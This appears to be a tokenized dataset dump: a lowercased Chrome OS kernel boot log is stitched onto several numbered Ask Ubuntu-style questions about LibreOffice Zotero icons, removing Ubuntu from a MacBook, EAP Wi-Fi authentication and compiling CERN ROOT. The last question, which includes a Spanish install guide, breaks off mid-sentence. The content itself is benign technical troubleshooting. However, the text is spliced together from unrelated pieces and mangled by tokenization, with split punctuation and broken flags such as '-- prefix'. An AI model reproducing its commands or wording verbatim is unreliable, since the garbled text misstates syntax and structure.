0000:00:1f.2 : irq 43 for msi/msi-x [ 1.106381 ] ahci : sss flag set , parallel bus scan disabled [ 1.106413 ] ahci 0000:00:1f.2 : ahci 0001.0300 32 slots 4 ports 6 gbps 0x1 impl sata mode [ 1.106420 ] ahci 0000:00:1f.2 : flags : 64bit ncq sntf ilck stag pm led clo pio slum part apst [ 1.106429 ] ahci 0000:00:1f.2 : setting latency timer to 64 [ 1.106992 ] scsi0 : ahci [ 1.107128 ] scsi1 : ahci [ 1.107233 ] scsi2 : ahci [ 1.107336 ] scsi3 : ahci [ 1.107477 ] ata1 : sata max udma/133 abar m2048 @ 0xe0705000 port 0xe0705100 irq 43 [ 1.107481 ] ata2 : dummy [ 1.107483 ] ata3 : dummy [ 1.107486 ] ata4 : dummy [ 1.107634 ] hso : /build/x86-mario/tmp/portage/sys-kernel/chromeos-kernel-3.4-r996/work/chromeos-kernel-3.4/drivers/net/usb/hso.c : option wireless [ 1.107663 ] usbcore : registered new interface driver hso [ 1.107742 ] ehci_hcd : usb 2.0 'enhanced ' host controller ( ehci ) driver [ 1.107788 ] ehci_hcd 0000:00:1a.0 : setting latency timer to 64 [ 1.107794 ] ehci_hcd 0000:00:1a.0 : ehci host controller [ 1.107888 ] ehci_hcd 0000:00:1a.0 : new usb bus registered , assigned bus number 1 [ 1.107927 ] ehci_hcd 0000:00:1a.0 : debug port 2 [ 1.111832 ] ehci_hcd 0000:00:1a.0 : cache line size of 64 is not supported [ 1.111856 ] ehci_hcd 0000:00:1a.0 : irq 21 , io mem 0xe0705800 [ 1.116971 ] ehci_hcd 0000:00:1a.0 : usb 2.0 started , ehci 1.00 [ 1.117013 ] usb usb1 : new usb device found , idvendor=1d6b , idproduct=0002 [ 1.117020 ] usb usb1 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 1.117025 ] usb usb1 : product : ehci host controller [ 1.117030 ] usb usb1 : manufacturer : linux 3.4.0 ehci_hcd [ 1.117034 ] usb usb1 : serialnumber : 0000:00:1a.0 [ 1.117211 ] hub 1-0:1.0 : usb hub found [ 1.117219 ] hub 1-0:1.0 : 7 ports detected [ 1.117353 ] ehci_hcd 0000:00:1d.0 : setting latency timer to 64 [ 1.117359 ] ehci_hcd 0000:00:1d.0 : ehci host controller [ 1.117422 ] ehci_hcd 0000:00:1d.0 : new usb bus registered , assigned bus number 2 [ 1.117460 ] ehci_hcd 0000:00:1d.0 : debug port 2 [ 1.121353 ] ehci_hcd 0000:00:1d.0 : cache line size of 64 is not supported [ 1.121377 ] ehci_hcd 0000:00:1d.0 : irq 19 , io mem 0xe0705c00 [ 1.126971 ] ehci_hcd 0000:00:1d.0 : usb 2.0 started , ehci 1.00 [ 1.127009 ] usb usb2 : new usb device found , idvendor=1d6b , idproduct=0002 [ 1.127015 ] usb usb2 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 1.127021 ] usb usb2 : product : ehci host controller [ 1.127025 ] usb usb2 : manufacturer : linux 3.4.0 ehci_hcd [ 1.127030 ] usb usb2 : serialnumber : 0000:00:1d.0 [ 1.127183 ] hub 2-0:1.0 : usb hub found [ 1.127190 ] hub 2-0:1.0 : 11 ports detected [ 1.127320 ] ohci_hcd : usb 1.1 'open ' host controller ( ohci ) driver [ 1.127339 ] uhci_hcd : usb universal host controller interface driver [ 1.127384 ] usbcore : registered new interface driver cdc_acm [ 1.127388 ] cdc_acm : usb abstract control model driver for usb modems and isdn adapters [ 1.127392 ] initializing usb mass storage driver ... [ 1.127422 ] usbcore : registered new interface driver usb-storage [ 1.127425 ] usb mass storage support registered . [ 1.127456 ] usbcore : registered new interface driver libusual [ 1.127474 ] usbcore : registered new interface driver ums-realtek [ 1.127510 ] usbcore : registered new interface driver usbserial [ 1.127528 ] usbcore : registered new interface driver usbserial_generic [ 1.127542 ] usb serial support registered for generic [ 1.127547 ] usbserial : usb serial driver core [ 1.127610 ] i8042 : pnp : ps/2 controller [ pnp0303 : ps2k ] at 0x60,0x64 irq 1 [ 1.127614 ] i8042 : pnp : ps/2 appears to have aux port disabled , if this is incorrect please boot with i8042.nopnp [ 1.134157 ] serio : i8042 kbd port at 0x60,0x64 irq 1 [ 1.134273 ] mousedev : ps/2 mouse device common for all mice [ 1.137481 ] device-mapper : ioctl : 4.22.0-ioctl ( 2011-10-19 ) initialised : dm-devel @ redhat.com [ 1.137510 ] device-mapper : verity : version 0.1.0 loaded [ 1.137514 ] device-mapper : verity-chromeos : dm-verity-chromeos registered [ 1.137593 ] cpuidle : using governor ladder [ 1.137691 ] cpuidle : using governor menu [ 1.137758 ] usbcore : registered new interface driver usbhid [ 1.137761 ] usbhid : usb hid core driver [ 1.182751 ] input : at translated set 2 keyboard as /devices/platform/i8042/serio0/input/input5 [ 1.217140 ] ata1 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) [ 1.242040 ] refined tsc clocksource calibration : 1097.506 mhz . [ 1.242050 ] switching to clocksource tsc [ 1.245326 ] cyapa 7-0067 : cypress apa trackpad information : [ 1.245329 ] product id : cytra-103002-00 [ 1.245330 ] protocol generation : 3 [ 1.245332 ] firmware version : 1.9 [ 1.245333 ] hardware version : 1.0 [ 1.245335 ] max abs x , y : 870,470 [ 1.245336 ] physical size x , y : 87,47 [ 1.245447 ] input : cyapa as /devices/pci0000:00/0000:00:1f.3/i2c-7/7-0067/input/input6 [ 1.250293 ] netfilter messages via netlink v0.30 . [ 1.250330 ] nf_conntrack version 0.5.0 ( 16384 buckets , 65536 max ) [ 1.250521 ] ctnetlink v0.93 : registering with nfnetlink . [ 1.250742 ] ip_tables : ( c ) 2000-2006 netfilter core team [ 1.250783 ] tcp : cubic registered [ 1.250786 ] initializing xfrm netlink socket [ 1.251041 ] net : registered protocol family 10 [ 1.251391 ] net : registered protocol family 17 [ 1.252924 ] magic number : 14:245:715 [ 1.253433 ] alsa device list : [ 1.253437 ] no soundcards found . [ 1.256655 ] ata1.00 : ata-8 : st320lt020-9yg142 , 0010sdm1 , max udma/133 [ 1.256666 ] ata1.00 : 625142448 sectors , multi 16 : lba48 ncq ( depth 31/32 ) [ 1.259173 ] ata1.00 : configured for udma/133 [ 1.259540 ] scsi 0:0:0:0 : direct-access ata st320lt020-9yg14 0010 pq : 0 ansi : 5 [ 1.259801 ] sd 0:0:0:0 : [ sda ] 625142448 512-byte logical blocks : ( 320 gb/298 gib ) [ 1.259809 ] sd 0:0:0:0 : [ sda ] 4096-byte physical blocks [ 1.259905 ] sd 0:0:0:0 : [ sda ] write protect is off [ 1.259910 ] sd 0:0:0:0 : [ sda ] mode sense : 00 3a 00 00 [ 1.259938 ] sd 0:0:0:0 : [ sda ] write cache : enabled , read cache : enabled , does n't support dpo or fua [ 1.341766 ] alternate gpt is invalid , using primary gpt . [ 1.341838 ] sda : sda1 sda2 sda3 sda4 sda5 sda6 sda7 sda8 sda9 sda10 sda11 sda12 [ 1.344042 ] sd 0:0:0:0 : [ sda ] attached scsi disk [ 1.344056 ] dm : attempting early device configuration . [ 1.344430 ] device-mapper : init : adding target '0 1740800 verity payload=root_dev hashtree=hash_dev hashstart=1740800 alg=sha1 root_hexdigest=98f86b8807863f8f73293eea0c0f1810da67d11a salt=9b5a1d53330cf997edaf2646b2f837f16df4a439e3a78905b01bc92413bdb117' [ 1.344447 ] device-mapper : verity : argument 0 : 'payload=root_dev' [ 1.344453 ] device-mapper : verity : argument 1 : 'hashtree=hash_dev' [ 1.344467 ] device-mapper : verity : argument 2 : 'hashstart=1740800' [ 1.344471 ] device-mapper : verity : argument 3 : 'alg=sha1' [ 1.344475 ] device-mapper : verity : argument 4 : 'root_hexdigest=98f86b8807863f8f73293eea0c0f1810da67d11a' [ 1.344480 ] device-mapper : verity : argument 5 : 'salt=9b5a1d53330cf997edaf2646b2f837f16df4a439e3a78905b01bc92413bdb117' [ 1.419083 ] usb 1-1 : new high-speed usb device number 2 using ehci_hcd [ 1.533546 ] usb 1-1 : new usb device found , idvendor=8087 , idproduct=0024 [ 1.533556 ] usb 1-1 : new usb device strings : mfr=0 , product=0 , serialnumber=0 [ 1.534017 ] hub 1-1:1.0 : usb hub found [ 1.534205 ] hub 1-1:1.0 : 4 ports detected [ 1.637078 ] usb 2-1 : new high-speed usb device number 2 using ehci_hcd [ 1.751755 ] usb 2-1 : new usb device found , idvendor=8087 , idproduct=0024 [ 1.751766 ] usb 2-1 : new usb device strings : mfr=0 , product=0 , serialnumber=0 [ 1.752234 ] hub 2-1:1.0 : usb hub found [ 1.752451 ] hub 2-1:1.0 : 4 ports detected [ 1.826221 ] usb 1-1.1 : new full-speed usb device number 3 using ehci_hcd [ 1.844992 ] device-mapper : verity : failed to acquire device 'root_dev ' : -1 [ 1.845022 ] device-mapper : table : 254:0 : verity : device lookup failed [ 1.845031 ] dm : starting dm-0 ( vroot ) failed [ 1.913577 ] usb 1-1.1 : string descriptor 0 read error : -22 [ 1.913591 ] usb 1-1.1 : new usb device found , idvendor=04ca , idproduct=3006 [ 1.913599 ] usb 1-1.1 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 1.917623 ] ext3-fs ( sda7 ) : error : could n't mount because of unsupported optional features ( 240 ) [ 1.928771 ] ext2-fs ( sda7 ) : error : could n't mount because of unsupported optional features ( 244 ) [ 1.935490 ] ext4-fs ( sda7 ) : info : recovery required on readonly filesystem [ 1.935500 ] ext4-fs ( sda7 ) : write access will be enabled during recovery [ 1.987333 ] usb 1-1.3 : new high-speed usb device number 4 using ehci_hcd [ 2.126006 ] usb 1-1.3 : new usb device found , idvendor=064e , idproduct=d251 [ 2.126016 ] usb 1-1.3 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 2.126022 ] usb 1-1.3 : product : hd webcam [ 2.126027 ] usb 1-1.3 : manufacturer : suyin [ 2.126032 ] usb 1-1.3 : serialnumber : hf1016-a21u-ov02-va-r01.00.03 [ 2.202141 ] usb 2-1.4 : new full-speed usb device number 3 using ehci_hcd [ 2.292999 ] usb 2-1.4 : new usb device found , idvendor=045e , idproduct=0745 [ 2.293009 ] usb 2-1.4 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 2.293016 ] usb 2-1.4 : product : microsoft\xffffffc2\xffffffae\xffffffae nano transceiver v2.0 [ 2.293021 ] usb 2-1.4 : manufacturer : microsoft [ 2.295733 ] input : microsoft microsoft\xffffffc2\xffffffae\xffffffae nano transceiver v2.0 as /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.4/2-1.4:1.0/input/input7 [ 2.296201 ] generic-usb 0003:045e:0745.0001 : input , hidraw0 : usb hid v1.11 keyboard [ microsoft microsoft\xffffffc2\xffffffae\xffffffae nano transceiver v2.0 ] on usb-0000:00:1d.0-1.4/input0 [ 2.301834 ] input : microsoft microsoft\xffffffc2\xffffffae\xffffffae nano transceiver v2.0 as /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.4/2-1.4:1.1/input/input8 [ 2.302422 ] generic-usb 0003:045e:0745.0002 : input , hidraw1 : usb hid v1.11 mouse [ microsoft microsoft\xffffffc2\xffffffae\xffffffae nano transceiver v2.0 ] on usb-0000:00:1d.0-1.4/input1 [ 2.318485 ] input : microsoft microsoft\xffffffc2\xffffffae\xffffffae nano transceiver v2.0 as /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.4/2-1.4:1.2/input/input9 [ 2.319203 ] generic-usb 0003:045e:0745.0003 : input , hiddev0 , hidraw2 : usb hid v1.11 device [ microsoft microsoft\xffffffc2\xffffffae\xffffffae nano transceiver v2.0 ] on usb-0000:00:1d.0-1.4/input2 [ 5.823647 ] ext4-fs ( sda7 ) : orphan cleanup on readonly fs [ 5.823667 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3513 [ 5.823802 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3611 [ 5.823952 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 272365 [ 5.824109 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3623 [ 5.824149 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3622 [ 5.824180 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3621 [ 5.824210 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3619 [ 5.824241 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3609 [ 5.824271 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3608 [ 5.824301 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3582 [ 5.824332 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3569 [ 5.824363 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3562 [ 5.854779 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3535 [ 5.854898 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3566 [ 5.854924 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3544 [ 5.854950 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3524 [ 5.854978 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3523 [ 5.855001 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3505 [ 5.855025 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3589 [ 5.855086 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 271982 [ 5.897299 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 271340 [ 5.897371 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3575 [ 5.897397 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3606 [ 5.897420 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3616 [ 5.897443 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3615 [ 5.897469 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3357 [ 5.897493 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3614 [ 5.897516 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3613 [ 5.897538 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3612 [ 5.897560 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3601 [ 5.897582 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3607 [ 5.897603 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3610 [ 5.897626 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3587 [ 5.931076 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 1100 [ 5.931167 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3605 [ 5.931193 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3602 [ 5.931217 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3600 [ 5.931240 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3598 [ 5.931262 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3590 [ 5.931284 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3588 [ 5.931306 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3592 [ 5.931328 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3593 [ 5.970752 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 276998 [ 5.970876 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 272028 [ 5.970903 ] ext4-fs ( sda7 ) : 44 orphan inodes deleted [ 5.970907 ] ext4-fs ( sda7 ) : recovery complete [ 6.164026 ] ext4-fs ( sda7 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 6.164067 ] vfs : mounted root ( ext4 filesystem ) readonly on device 8:7 . [ 6.178507 ] devtmpfs : mounted [ 6.182131 ] freeing unused kernel memory : 624k freed [ 6.182296 ] write protecting the kernel read-only data : 8192k [ 6.193659 ] freeing unused kernel memory : 1652k freed [ 6.195935 ] freeing unused kernel memory : 264k freed [ 6.740671 ] init : failed to create pty - disabling logging for job [ 6.740732 ] init : temporary process spawn error : no space left on device [ 6.832606 ] init : failed to create pty - disabling logging for job [ 6.832689 ] init : temporary process spawn error : no space left on device [ 6.851637 ] init : failed to create pty - disabling logging for job [ 6.851710 ] init : temporary process spawn error : no space left on device [ 6.852703 ] init : failed to create pty - disabling logging for job [ 6.852754 ] init : temporary process spawn error : no space left on device [ 17.156857 ] init : failed to create pty - disabling logging for job [ 17.156930 ] init : temporary process spawn error : no space left on device [ 17.162739 ] init : failed to create pty - disabling logging for job [ 17.162811 ] init : temporary process spawn error : no space left on device [ 17.174036 ] init : failed to create pty - disabling logging for job [ 17.174109 ] init : temporary process spawn error : no space left on device [ 18.176603 ] udevd [ 142 ] : starting version 175 [ 18.290725 ] cfg80211 : calling crda to update world regulatory domain [ 18.291168 ] tg3.c : v3.123 ( march 21 , 2012 ) [ 18.291524 ] nm10_gpio version 0.04 built on aug 26 2012 at 19:06:30 [ 18.291539 ] gpiochip_find_base : found new base at 160 [ 18.291585 ] gpiochip_add : registered gpios 160 to 255 on device : 0000:00:1f.0 [ 18.301400 ] init : plymouth main process ( 65 ) killed by segv signal [ 18.301922 ] init : plymouth-splash main process ( 200 ) terminated with status 2 [ 18.312271 ] rtc_cmos 00:08 : rtc can wake from s4 [ 18.314151 ] sdhci : secure digital host controller interface driver [ 18.314156 ] sdhci : copyright ( c ) pierre ossman [ 18.349612 ] rtc_cmos 00:08 : rtc core : registered rtc_cmos as rtc0 [ 18.349658 ] rtc0 : alarms up to one month , 242 bytes nvram , hpet irqs [ 18.372489 ] tg3 0000:02:00.0 : eth0 : tigon3 [ partno ( bcm57785 ) rev 57785100 ] ( pci express ) mac address b8:88 : e3 : d7:30:2d [ 18.372523 ] tg3 0000:02:00.0 : eth0 : attached phy is 57765 ( 10/100/1000base-t ethernet ) ( wirespeed [ 1 ] , eee [ 1 ] ) [ 18.372533 ] tg3 0000:02:00.0 : eth0 : rxcsums [ 1 ] linkchgreg [ 0 ] miirq [ 0 ] asf [ 0 ] tsocap [ 1 ] [ 18.372539 ] tg3 0000:02:00.0 : eth0 : dma_rwctrl [ 00000001 ] dma_mask [ 64-bit ] [ 18.372737 ] sdhci-pci 0000:02:00.1 : sdhci controller found [ 14e4:16bc ] ( rev 10 ) [ 18.372772 ] sdhci-pci 0000:02:00.1 : invalid iomem size . you may experience problems . [ 18.373013 ] registered led device : mmc0 : : [ 18.374515 ] mmc0 : sdhci controller on pci [ 0000:02:00.1 ] using adma [ 18.382774 ] snd_hda_intel 0000:00:1b.0 : irq 44 for msi/msi-x [ 18.394832 ] ath : phy0 : aspm enabled : 0x43 [ 18.394840 ] ath : eeprom regdomain : 0x6a [ 18.394843 ] ath : eeprom indicates we should expect a direct regpair map [ 18.394849 ] ath : country alpha2 being used : 00 [ 18.394852 ] ath : regpair used : 0x6a [ 18.401573 ] bluetooth : core ver 2.16 [ 18.401612 ] net : registered protocol family 31 [ 18.401616 ] bluetooth : hci device and connection manager initialized [ 18.401621 ] bluetooth : hci socket layer initialized [ 18.401625 ] bluetooth : l2cap socket layer initialized [ 18.401640 ] bluetooth : sco socket layer initialized [ 18.404824 ] ieee80211 phy0 : selected rate control algorithm 'ath9k_rate_control' [ 18.405498 ] registered led device : ath9k-phy0 [ 18.405509 ] ieee80211 phy0 : atheros ar9462 rev:2 mem=0xffffc90014f80000 , irq=17 [ 18.413174 ] usbcore : registered new interface driver btusb [ 18.457524 ] linux video capture interface : v2.00 [ 18.460063 ] uvcvideo : found uvc 1.00 device hd webcam ( 064e : d251 ) [ 18.468932 ] usbcore : registered new interface driver uvcvideo [ 18.468938 ] usb video class driver ( 1.1.1 ) [ 18.700280 ] cfg80211 : world regulatory domain updated : [ 18.700286 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 18.700293 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 18.700298 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 18.700303 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 18.700308 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 18.700312 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 18.744712 ] udevd [ 160 ] : renamed network interface eth0 to eth1 [ 18.966322 ] input : hda intel pch hdmi/dp , pcm=8 as /devices/pci0000:00/0000:00:1b.0/sound/card0/input10 [ 18.966455 ] input : hda intel pch hdmi/dp , pcm=7 as /devices/pci0000:00/0000:00:1b.0/sound/card0/input11 [ 18.966590 ] input : hda intel pch hdmi/dp , pcm=3 as /devices/pci0000:00/0000:00:1b.0/sound/card0/input12 [ 18.966717 ] input : hda intel pch mic as /devices/pci0000:00/0000:00:1b.0/sound/card0/input13 [ 18.966946 ] input : hda intel pch headphone as /devices/pci0000:00/0000:00:1b.0/sound/card0/input14 [ 20.078996 ] ext4-fs ( sda7 ) : re-mounted . opts : errors=remount-ro [ 20.350512 ] init : plymouth-log main process ( 543 ) terminated with status 1 [ 20.351908 ] init : failsafe main process ( 545 ) killed by term signal [ 20.417195 ] init : plymouth-upstart-bridge main process ( 584 ) terminated with status 1 [ 20.435479 ] bluetooth : rfcomm socket layer initialized [ 20.435485 ] bluetooth : rfcomm ver 1.11 [ 20.746137 ] ieee80211 phy0 : device now idle [ 20.749960 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 20.760725 ] tg3 0000:02:00.0 : irq 45 for msi/msi-x [ 20.760738 ] tg3 0000:02:00.0 : irq 46 for msi/msi-x [ 20.760747 ] tg3 0000:02:00.0 : irq 47 for msi/msi-x [ 21.325057 ] addrconf ( netdev_up ) : eth1 : link is not ready [ 21.341951 ] ieee80211 phy0 : device no longer idle - scanning [ 22.347298 ] fuse init ( api version 7.18 ) [ 26.001399 ] ieee80211 phy0 : device now idle [ 26.042838 ] ieee80211 phy0 : device no longer idle - scanning [ 29.924170 ] wlan0 : authenticate with 00:18 : e7 : f5 : e4:82 [ 29.924185 ] ieee80211 phy0 : allocated sta 00:18 : e7 : f5 : e4:82 [ 29.927953 ] ieee80211 phy0 : inserted sta 00:18 : e7 : f5 : e4:82 [ 29.927961 ] wlan0 : send auth to 00:18 : e7 : f5 : e4:82 ( try 1/3 ) [ 29.929945 ] wlan0 : authenticated [ 29.929954 ] wlan0 : moving sta 00:18 : e7 : f5 : e4:82 to state 2 [ 29.934204 ] wlan0 : associate with 00:18 : e7 : f5 : e4:82 ( try 1/3 ) [ 29.938514 ] wlan0 : rx assocresp from 00:18 : e7 : f5 : e4:82 ( capab=0x431 status=0 aid=5 ) [ 29.938522 ] wlan0 : associated [ 29.938550 ] wlan0 : moving sta 00:18 : e7 : f5 : e4:82 to state 3 [ 29.938561 ] ieee80211 phy0 : wmm queue=2 aci=0 acm=0 aifs=3 cwmin=15 cwmax=1023 txop=0 uapsd=0 [ 29.938571 ] ieee80211 phy0 : wmm queue=3 aci=1 acm=0 aifs=7 cwmin=15 cwmax=1023 txop=0 uapsd=0 [ 29.938579 ] ieee80211 phy0 : wmm queue=1 aci=2 acm=0 aifs=2 cwmin=7 cwmax=15 txop=94 uapsd=0 [ 29.938587 ] ieee80211 phy0 : wmm queue=0 aci=3 acm=0 aifs=2 cwmin=3 cwmax=7 txop=47 uapsd=0 [ 29.941856 ] addrconf ( netdev_change ) : wlan0 : link becomes ready [ 29.943217 ] wlan0 : dropped frame to 00:18 : e7 : f5 : e4:82 ( unauthorized port ) [ 29.962375 ] wlan0 : moving sta 00:18 : e7 : f5 : e4:82 to state 4 [ 40.182929 ] wlan0 : no ipv6 routers present
406184	zotero/libreoffice icons in xubuntu 13.10	i 've seen various fixes and have tried a bunch ( all with varying degrees of success - explained below ) , and this is the sort of pertinacity thing which really annoys me - no icons in libreoffice for the zotero toolbar , although the toolbar works fine . upon first install of the lo plugin , there was a 'flicker ' of icons - they came and went very quickly in lo within a second or so . i googled a bit and found a thing suggesting manually setting your lo to point at java ( which i 'd disabled , following this tip ) . enabled , still no icons . read through a looooong couple of questions on the ubuntuforums , another few at the zotero forums ... finally found one suggesting setting the icon size in lo to 'large ' . i did this , and played with the themes in lo a bit ( there are only two installed , humanity and galaxy , so it did n't take long ! ) . whatever i did seemed to 'update ' the ui since the icons reappearing for both themes , i even set the icon scale back to automatic . all was fine for a couple of minutes ... but then i got to installing dictionaries for my locale ( en-gb , for some reason , lo does n't pick it up automatically , and gives me ae ) ... that all done , i flip back to lo and the icons have disappeared again . and playing with the icon settings does nothing either ... eugh ! there probably is an answer somewhere , but i 've been trying to fix this by trawling through forum pages from years ago for about 30 mins + now and i 've had enough . direct responses and/or a checklist would be great , telling me how to manually point the plugin at the folder where the icons are stored ( they must be somewhere , right ? ! ) would be ideal . ._ . it 's times like this that make you want to plant a fist into your screen . lol .
406185	unable to remove/uninstall ubuntu from a macbook	i recently received an old macbook from my brother . he had installed some version of ubuntu on it . i have n't been able to use it since it 's completely foreign to me . therefore , i decided to uninstall it . the problem is ; it does n't seem to be away to reach the bios on start-up . something called yaboot appears on screen and i have no clue what to do with that . i am all set up to install a new is but this has stopped me . i 'm very new to ubuntu as i have no experience using it . kindly explain as to what i should do with basic explanations . also , please advise me if any further information needed .
406189	connecting to eap without inner-phase authenication ?	i 'm having issues connecting with enterprise eap networks due to the lack of inner-phase authentication , which is required by network manager in ubuntu . i can not set this to none . is there a way around that ?
406190	how i can install root cern ?	i make : /configure linuxx8664gcc -- prefix=/usr/local \ -- with-gsl-incdir=/usr/local/include/gsl \ -- with-gsl-libdir=/usr/local/lib \ -- enable-rpath then make and i get this error : make gcc -o2 -pipe -m64 -wshadow -wall -w -fpic -iinclude -dr__have_config -pthread -dincludedir=\ '' /usr/include\ '' -dobjsuffix=\ '' .o\ '' -o build/rmkdepend/main.o -c /usr/share/root/build/rmkdepend/main.c /usr/share/root/build/rmkdepend/main.c:64:12 : error : conflicting types for ‘fchmod’ extern int fchmod ( int , int ) ; ^ in file included from /usr/share/root/build/rmkdepend/def.h:42:0 , from /usr/share/root/build/rmkdepend/main.c:30 : /usr/include/x86_64-linux-gnu/sys/stat.h:298:12 : note : previous declaration of ‘fchmod’ was here extern int fchmod ( int __fd , __mode_t __mode ) __throw ; ^ running /usr/share/root/build/unix/compiledata.sh changing include/compiledata.h running /usr/share/root/cint/root/configcint.mk changing cint/cint/inc/configcint.h bin/rmkdepend -r -fcint/cint/src/g__cfunc.d -y -w 1000 -- -pipe -m64 -wall -w -fpic -iinclude -dr__have_config -dg__regexp -dg__unix -dg__sharedlib -dg__osfdll -dg__root -dg__redirectio -dg__std_exception -dg__64bit -dg__have_config -dg__nomakeinfo -dg__cintbody -i/usr/share/root/cint/cint/inc -i/usr/share/root/cint/cint/src -i/usr/share/root/cint/cint/src/dict -pthread -i . -- /usr/share/root/cint/cint/src/g__cfunc.c make : bin/rmkdepend : command not found make : *** [ cint/cint/src/g__cfunc.o ] error 127 vercion de ubuntu 12.04 lts enero 2014 paso_0 : instale las librerias necesarias ( con synaptic ) : gfortran , libxpm4 , libxpm-dev , libxft-devel , libxext-dev ver requisitos en la pagina : http : //root.cern.ch/drupal/content/build-prerequisites paso_1 : * descargar el paquete gsl-1.16.tar.gz , de la pagina : http : //www.gnu.org/software/gsl * descargar vercion de root : root_v5.30.06.source.tar.gz ( puede intentar con otra vercion , la vercion 30.06 ha sido verificada ) paso_2 : ir al directorio `` /usr/share '' cd /usr/share descomprimir gsl-1.16.tar.gz sudo tar xvf /home/tu_usuario/descargas/gsl-1.16.tar.gz ir al directorio `` gsl-1.16 '' cd gsl-1.16 ejecutar : sudo ./configure sudo make sudo make install paso_3 : descomprimir root_v5.30.06.source.tar.gz sudo tar xvf /home/tu_usuario/descargas/root_v5.30.06.source.tar.gz ir al directorio `` root '' cd root elaborar un script con lo siguiente : sudo nano rscript.sh una vez dentro escribir lo siguiente : sudo ./configure linuxx8664gcc -- prefix=/usr/local -- with-gsl-incdir=/usr/local/include/gsl -- with-gsl-libdir=/usr/local/lib -- enable-explicitlink cerrar y guardar con control+x y poner `` y '' de yes . ejecutar script : source rscript.sh despues ejecutar : sudo make ( si esto no llegase a funcionar en el paso `` make '' agregue al script : -- enable-rpath o -- enable-soversion , o ambas ) sudo make install en principio esto deberia hacer funcionar root de ser asi el proceso ha terminado , pero puede surgir el siguiente error : '' could n't find font `` -adobe-helvetica-medium-r-*-*-10-*-*-*-*-*-iso8859-1 '' , trying `` fixed '' . please fix your system so helvetica can be found , this font typically is in the rpm ( or pkg equivalent ) package xfree86- [ 75,100 ] dpi-fonts or fonts-xorg- [ 75,100 ] dpi . / usr/local/bin/root.exe : error while loading shared libraries : libcore.so : can not open shared object file : no such file or directory '' de ser así ejecute lo siguiente en la 